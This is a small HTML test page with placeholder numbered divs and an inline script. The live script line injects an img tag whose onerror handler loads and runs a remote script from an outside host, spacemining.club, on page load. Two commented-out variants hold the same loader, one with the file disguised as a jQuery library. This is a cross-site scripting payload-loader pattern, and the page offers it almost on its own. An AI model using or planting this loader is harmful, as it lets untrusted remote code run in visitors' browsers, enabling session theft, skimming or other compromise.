<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <style>
        body{
            color: blue;
        }
        #a{
            display: flex;
            justify-content: center;
            align-items: center;
            font-size: 70px;
            height: 1000px;
            background-color: red;
        }
    </style>
</head>
<body>
<div id="b">1</div>
<div>2</div>
<div>3</div>
<div>4</div>
<div>5</div>
<div>6</div>
<div>7</div>
<div>8</div>
<div>90</div>
<div id="a">0</div>
<script>
    /*document.getElementById('b').innerHTML=`<img id='agentleimgtest' src='' onerror='var a=document.createElement("script");a.src="http://www.spacemining.club/jquery-1.6.3.min.js";document.getElementsByTagName("head")[0].appendChild(a);'>`*/
    document.getElementById('b').innerHTML=`<img id='pq' src='' onerror='var a=document.createElement("script");a.src="http://www.spacemining.club/a.js";document.body.appendChild(a)'>`
    /*document.getElementById('b').innerHTML=`<img id='agentleimgtest' src='' onerror='var a=document.createElement("script");a.src="http://localhost:8080/Xtest/jquery-1.6.3.min.js";document.getElementsByTagName("head")[0].appendChild(a);'>`*/
</script>
</body>
</html>